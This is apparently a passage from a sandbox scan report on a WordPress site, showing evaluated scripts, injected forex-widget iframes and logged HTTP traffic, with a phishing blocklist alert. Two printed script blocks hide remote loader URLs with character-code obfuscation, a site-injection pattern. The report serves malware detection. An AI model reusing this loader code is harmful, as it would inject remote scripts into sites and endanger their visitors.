        document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
        d.getElementsByTagName('head')[0].appendChild(s);
    }
}
#6 JavaScript::Eval (size: 671) - SHA256: 1a14a530a69e438860a722d1793b14ea7d69787812b59c5439da766c853fb72c
var scripts = document.getElementsByTagName("script");
var wantme = false;
for (var i = 0; i < scripts.length; i++) {
    if (scripts[i].id) {
        if (scripts[i].id == "trackmyposs") {
            wantme = true;
        }
    }
}
if (wantme == false) {
    var d = document;
    var s = d.createElement('script');
    s.id = "trackmyposs";
    s.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 116, 114, 105, 99, 107, 46, 99, 111, 102, 111, 117, 110, 100, 101, 114, 115, 112, 101, 99, 105, 97, 108, 115, 46, 99, 111, 109, 47, 116, 114, 97, 99, 107, 46, 106, 115, 63, 118, 61, 53, 46, 53, 53, 53);
    if (document.currentScript) {
        document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
        d.getElementsByTagName('head')[0].appendChild(s);
    }
}
#7 JavaScript::Eval (size: 676) - SHA256: df26ce4b1aa046d6fa0b9ad50c4f12cadb2c7c421b876a273cbd6a126d851222
var psss = document.getElementsByTagName("script");
var wantmee = false;
for (var i = 0; i < psss.length; i++) {
    if (psss[i].id) {
        if (psss[i].id == "spectrepoint") {
            wantmee = true;
        }
    }
}
if (wantmee == false) {
    var d = document;
    var s = d.createElement('script');
    s.id = "spectrepoint";
    s.async = true;
    s.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 108, 111, 97, 100, 46, 98, 101, 116, 116, 101, 114, 115, 104, 105, 116, 101, 99, 111, 108, 117, 109, 110, 46, 99, 111, 109, 47, 115, 108, 97, 115, 104, 46, 106, 115, 63, 118, 61, 48, 46, 57, 46, 55);
    if (document.currentScript) {
        document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
        d.getElementsByTagName('head')[0].appendChild(s);
    }
}

Executed Writes (4)
#1 JavaScript::Write (size: 527) - SHA256: 08d9b97d5ab63aef8ccf30ffd5da2396a4b7395103c16eaea8f83e7f5a3412f7
< iframe src = "https://freeserv.dukascopy.com/2.0/?path=realtime_sentiment_index/index&liquidity=consumers&type=swfx&showPairs=true&showCurrencies=true&availableInstruments=l%3AEUR/USD%2CGBP/USD%2CUSD/CHF%2CUSD/JPY%2CAUD/USD%2CXAU/USD%2CE_SandP-500%2CE_Brent&availableCurrencies=AUD%2CCAD%2CCHF%2CGBP%2CJPY%2CNZD%2CUSD%2CEUR&headingColor=%23000000&dateColor=%23000000&bgColor=%23ffffff&width=940&height=535&adv=popup"
border = "0"
marginWidth = "0"
marginHeight = "0"
frameBorder = "0"
scrolling = "no"
width = "940"
height = "535" > < /iframe>
#2 JavaScript::Write (size: 321) - SHA256: 7cb1da852b5b400eaf0618b8752fb3969dc8c7c473ec247cc8befebc13d84aec
< iframe src = "https://freeserv.dukascopy.com/2.0/?path=intraday_movers_and_shakers/index&headingColor=%23000000&dateColor=%23000000&valueColor=%23000000&bgColor=%23ffffff&width=100%25&height=100%25&adv=popup"
border = "0"
marginWidth = "0"
marginHeight = "0"
frameBorder = "0"
scrolling = "no"
width = "100%"
height = "100%" > < /iframe>
#3 JavaScript::Write (size: 889) - SHA256: 7b0f9f850f65a9377e975402f1633c6b4de053ac6c2303b5954801de31402a8c
< iframe src = "https://freeserv.dukascopy.com/2.0/?path=fxmarkethours/index&showHeader=false&displayMainMenu=true&displayTimezoneChange=true&displayInstrumentChange=true&displaySpreadIndicator=true&displayVolumeIndicator=true&displayVolatilityIndicator=true&displayFollowButton=true&allowTimezoneChange=true&allowInstrumentChange=true&defaultTimezone=0&showIndicator=0&defaultFollowMode=false&worldMapColor=red&hoursBackground=%23444f5f&hoursActiveBackground=%237d92b0&hoursTextColor=%23ffffff&currentHourBGColor=%23f9fdff&dstHourColor=%230cf6ff&indicatorBarColor=%235090c6&graphPointsColor=%23ffffff&spreadTopGraphColor=%23208c1c&spreadBottomGraphColor=%23dc0e0e&volatilityGraphColor=%23146fba&availableInstruments=l%3A&instrument=EUR/USD&width=743&height=466&adv=popup&lang=en"
border = "0"
marginWidth = "0"
marginHeight = "0"
frameBorder = "0"
scrolling = "no"
width = "743"
height = "466" > < /iframe>
#4 JavaScript::Write (size: 593) - SHA256: 6a81b067ab3dcd877043b20de7c77c4b7809a1991c92f92f52a8d4120227b743
< iframe src = "https://freeserv.dukascopy.com/2.0/?path=runboard/index&instruments=EUR/USD%2CUSD/JPY%2CGBP/USD%2CEUR/JPY%2CGBP/JPY%2CUSD/CAD%2CXAU/USD%2CAUD/USD%2CUSD/CHF%2CNZD/USD%2CE_Brent%2CE_SandP-500%2CE_DJE50XX%2CE_N225Jap&showDelta=true&showDeltaPercent=true&animationSpeed=100000&fontSize=12&fontFamily=Verdana%2C%20Geneva%2C%20sans-serif&instrumentColor=%23666666&priceColor=%23000000&delimeterColor=%230000FF&bgColor=%23FFFFFF&width=100%25&padding=30px&height=30&adv=popup"
border = "0"
marginWidth = "0"
marginHeight = "0"
frameBorder = "0"
scrolling = "no"
width = "100%"
height = "30" > < /iframe>


HTTP Transactions (122)


Request Response
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.249
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "12AF026999398F4976749E320667D43DA3F99B7A2E8254ACA7A410A964A106AA"
Last-Modified: Thu, 24 Nov 2022 06:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9047
Expires: Sat, 26 Nov 2022 00:38:49 GMT
Date: Fri, 25 Nov 2022 22:08:02 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5133
Cache-Control: max-age=136124
Date: Fri, 25 Nov 2022 22:08:02 GMT
Etag: "63809972-1d7"
Expires: Sun, 27 Nov 2022 11:56:46 GMT
Last-Modified: Fri, 25 Nov 2022 10:31:14 GMT
Server: ECS (ska/F706)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: Content-Type, Content-Length, Alert, Backoff, Retry-After
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 939
via: 1.1 google
date: Fri, 25 Nov 2022 21:17:29 GMT
cache-control: public,max-age=3600
age: 3033
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    4d7e4eed097b9c4e5d509419f1cfc85a
Sha1:   290bb3d428a7c6330e2e3d73a952b16f820896c8
Sha256: 0dc9ca0f57af15adcd416035e92794711434e3d53a1feff21d8481d6d500986c
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.249
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "C9951A909F354174F0075A01C01C3C3AA6960983040E328BFBBBEA81AEB405C2"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=3276
Expires: Fri, 25 Nov 2022 23:02:38 GMT
Date: Fri, 25 Nov 2022 22:08:02 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         34.160.144.191
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
x-amz-id-2: JAP6zlqVClfUzqLa5Io8kI6/VS7LvrSmQHIhXrhNt7hv17DVJmLjIUCgmnDkEAeOLkzbtOLz1SI=
x-amz-request-id: P2DC0GHVPKHAQ7YC
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Fri, 25 Nov 2022 21:40:57 GMT
age: 1625
last-modified: Thu, 10 Nov 2022 09:21:27 GMT
etag: "9ebddc2b260d081ebbefee47c037cb28"
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    9ebddc2b260d081ebbefee47c037cb28
Sha1:   492bad62a7ca6a74738921ef5ae6f0be5edebf39
Sha256: 74bbb7cba16f7d084a08a0907d47d7496e5c148f904707ec6950f8f6a61027e5
                                        
                                            GET / HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

search
                                         162.213.255.22
HTTP/1.1 301 Moved Permanently
content-type: text/html
                                        
keep-alive: timeout=5, max=100
content-length: 707
date: Fri, 25 Nov 2022 22:08:02 GMT
server: LiteSpeed
location: https://profitcrow.com/
x-turbo-charged-by: LiteSpeed


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with CRLF, LF line terminators
Size:   707
Md5:    1304294c0823ca486542ba408ed761e3
Sha1:   b2a70fb2d810ca13985882e6981f33998823e83e
Sha256: 3bbe72f3baa8ec61de17a1d767fca58704769684b7abe9161d0c4eaf4c8f0982

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:02 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: ETag, Content-Type, Content-Length, Last-Modified, Alert, Backoff, Pragma, Expires, Retry-After, Cache-Control
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 329
via: 1.1 google
date: Fri, 25 Nov 2022 21:11:11 GMT
cache-control: public,max-age=3600
age: 3412
last-modified: Fri, 25 Mar 2022 17:45:46 GMT
etag: "1648230346554"
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            POST / HTTP/1.1 
Host: ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         104.18.32.68
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 25 Nov 2022 22:08:03 GMT
Content-Length: 472
Connection: keep-alive
Last-Modified: Fri, 25 Nov 2022 08:39:29 GMT
Expires: Fri, 02 Dec 2022 08:39:28 GMT
Etag: "78fdb48758198ffcdd12499e1cc3a1672a6fb12b"
Cache-Control: max-age=555684,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb5
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 76fdb3640eefb50b-OSL

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 2874
Cache-Control: max-age=128802
Date: Fri, 25 Nov 2022 22:08:03 GMT
Etag: "638085ab-1d7"
Expires: Sun, 27 Nov 2022 09:54:45 GMT
Last-Modified: Fri, 25 Nov 2022 09:06:51 GMT
Server: ECS (ska/F706)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: E3baPpoRSH/2LpvXrkXuEg==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

search
                                         54.202.70.174
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: Z7R0CJP8ZGdLYps1lfa5ttPXX1I=

                                        
                                            GET /ajax/libs/jquery/3.6.0/jquery.min.js HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://profitcrow.com
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         104.17.25.14
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Fri, 25 Nov 2022 22:08:03 GMT
content-length: 27938
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "603e8adc-15d9d"
last-modified: Tue, 02 Mar 2021 18:58:36 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
vary: Accept-Encoding
cf-cache-status: HIT
age: 1227808
expires: Wed, 15 Nov 2023 22:08:03 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uqf1R4LDI9tZmyLhekjxGz8ccV8Fn9APeLh6ORXUDZ2ydtMKreowCFzSZrFNdj2GzxrYzvsfzHFNYth%2Bd7Kfx2Cs9Fq5CuyiH9MWxcrmdT9QqXbaUyCnMNlNUFxSW1Q88TDPQmxC"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 76fdb368cd02b506-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65447)
Size:   27938
Md5:    d900ca08873ee57d40616d39a44cc0aa
Sha1:   7ab3ac8b1504b7b914a6e94c979b8390bb492f6a
Sha256: 1eea479cc0abe04a0846f41031207f9511f12ffef017a6109d4efb6f5523465b
                                        
                                            GET /ajax/libs/font-awesome/6.0.0/css/all.min.css HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://profitcrow.com
Connection: keep-alive
Sec-Fetch-Dest: style
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         104.17.25.14
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
date: Fri, 25 Nov 2022 22:08:03 GMT
content-length: 15248
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "620188b3-3b90"
last-modified: Mon, 07 Feb 2022 21:01:39 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 8130661
expires: Wed, 15 Nov 2023 22:08:03 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SdszxUUysYJ5%2BH6utl%2FHZAHzadQQWBjGzlVqIO6VYx9mqCjU82%2FjM6nlUt%2FNXajt8%2FafK7AZhBUDW3WSK7f1uO4VYUpjDCmbDXn%2BnJL70uTi3pwpEhzB0rfQqN8EK2pJXsCyG%2BRY"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 76fdb368ccfeb506-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65317)
Size:   15248
Md5:    eaa2e9825d0aa4108e5c61a9058f5434
Sha1:   2c855186ced95e99325836c2af8b9cc2e823848a
Sha256: 65b91a9d675a0b22b90132b403e14db1fe82496a45c2a077ddecb2452e929077
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 25 Nov 2022 22:08:03 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /jquery-3.6.0.min.js HTTP/1.1 
Host: code.jquery.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://profitcrow.com
Connection: keep-alive
Referer: https://profitcrow.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         69.16.175.42
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Fri, 25 Nov 2022 22:08:03 GMT
content-encoding: gzip
content-length: 30875
last-modified: Fri, 20 Aug 2021 17:47:53 GMT
accept-ranges: bytes
server: nginx
etag: W/"611feac9-15d9d"
cache-control: max-age=315360000, public
access-control-allow-origin: *
vary: Accept-Encoding
x-hw: 1669414083.dop208.sk1.t,1669414083.cds258.sk1.hn,1669414083.cds210.sk1.c
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65447)
Size:   30875
Md5:    899f0189aaf034bbba5340f724d91dfa
Sha1:   210ea9de03968edb9d839ba4a0ce2d48666a8ab8
Sha256: 949b6597c5ea907a7ef3c8ca6d5ffc73be2352f9df485b78704e5c4dabac5d0f
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5588
Cache-Control: max-age=162857
Date: Fri, 25 Nov 2022 22:08:03 GMT
Etag: "63810018-117"
Expires: Sun, 27 Nov 2022 19:22:20 GMT
Last-Modified: Fri, 25 Nov 2022 17:49:12 GMT
Server: ECS (amb/6B96)
X-Cache: HIT
Content-Length: 279

                                        
                                            GET /css?family=Lora%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&display=auto&ver=6.0.1 HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Fri, 25 Nov 2022 22:08:04 GMT
date: Fri, 25 Nov 2022 22:08:04 GMT
cache-control: private, max-age=86400
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   1183
Md5:    6baaf44396f6104d1047803659b4e0bb
Sha1:   73911ebd4e7547b6b75eb6b453d580d05a877901
Sha256: 26a9ff4fe98b51c919449c2916754b891dfab5ecfd6d80693d45571a343991ec
                                        
                                            GET /wp-includes/css/dist/block-library/style.min.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:03 GMT
last-modified: Wed, 03 Aug 2022 05:15:30 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 10946
date: Fri, 25 Nov 2022 22:08:03 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (43771)
Size:   10946
Md5:    d45207ee05c1f0c57dfa075e61405ccd
Sha1:   a8d35143a2d828a739ea0fdde75f97d33621e7ec
Sha256: a9a4adbbcee31ec277f1bdd573eef97dc4341f29f2db3b5685a02dfe4d2fe9bb
                                        
                                            GET /wp-content/plugins/contact-form-7/includes/css/styles.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:03 GMT
last-modified: Thu, 23 Dec 2021 11:30:13 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 848
date: Fri, 25 Nov 2022 22:08:03 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   848
Md5:    c962ba8e7d42ff9da18392b41dad5151
Sha1:   7b89bc5e6ad161df2e6d7f7fb3ad894aa04b827f
Sha256: 322a4949c5bdd82eb80c13bbbd407ce30a7ad226685c54270d246cb6960e524e
                                        
                                            GET /wp-content/plugins/video-popup/css/YouTubePopUp.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:03 GMT
last-modified: Tue, 11 Jan 2022 12:22:43 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 942
date: Fri, 25 Nov 2022 22:08:03 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   942
Md5:    dab981875b77849c08e2ddb279e375ea
Sha1:   c98c3f91dc170e7ec53a83462a1186f7612d97b9
Sha256: 5d5a5845ac72af88574fc634dcc03a297efc05303e4e81f3039a6abb55f65b96
                                        
                                            GET /wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
